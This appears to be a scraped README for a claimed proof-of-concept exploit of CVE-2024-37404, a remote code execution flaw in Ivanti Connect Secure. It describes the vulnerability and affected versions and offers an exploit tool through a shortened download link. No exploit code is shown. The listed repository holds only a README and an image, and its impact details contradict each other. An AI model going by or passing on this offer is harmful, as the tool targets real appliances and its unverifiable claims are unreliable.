CVE-2024-37404 PoC: Ivanti Connect Secure and Ivanti Policy Secure security vulnerability

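Source
Related vulnerability
Title: Ivanti Connect Secure and Ivanti Policy Secure security vulnerability (CVE-2024-37404)
Description: Ivanti Connect Secure and Ivanti Policy Secure are both products of the US company Ivanti. Ivanti Connect Secure is a secure remote network connectivity tool. Ivanti Policy Secure is a network access control (NAC) solution. Ivanti Connect Secure and Ivanti Policy Secure contain a security vulnerability that stems from improper validation of user input. An attacker can exploit this vulnerability to execute code remotely.
Introduction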
## 🌟 Description
CVE-2024-37404 - Ivanti Connect Secure - Authenticated RCE via OpenSSL CRLF Injection
An attacker with administrative access to the web application, potentially gained through exploitation of previous vulnerabilities or credential compromise, could execute arbitrary code on the underlying system with root privileges.

## Details

- **CVE ID**: [CVE-2024-37404]
- **Discovered**: 2024-04-05
- **Published**: 2024-10-08
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/4XwoO)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-37404
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```


### Options

The options are listed in README.txt.

### Example

![image](https://github.com/nothe1senberg/CVE-2024-37404/blob/main/photo_2024-10-12_10-57-48.jpg)


## Affected versions
Ivanti Connect Secure versions prior to 22.7R2.1 and 22.7R2.2, and Ivanti Policy Secure versions prior to 22.7R1.1


## 📈 CVSS Information
Score: 9.1

Severity: CRITICAL

Confidentiality: None

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low

File snapshot

```
[4.0K] /data/pocs/ea19fd18ce6fdf5ba8d2450c8a5fb5a97e093809
├── [ 78K] photo_2024-10-12_10-57-48.jpg
└── [1.4K] README.md

0 directories, 2 files
```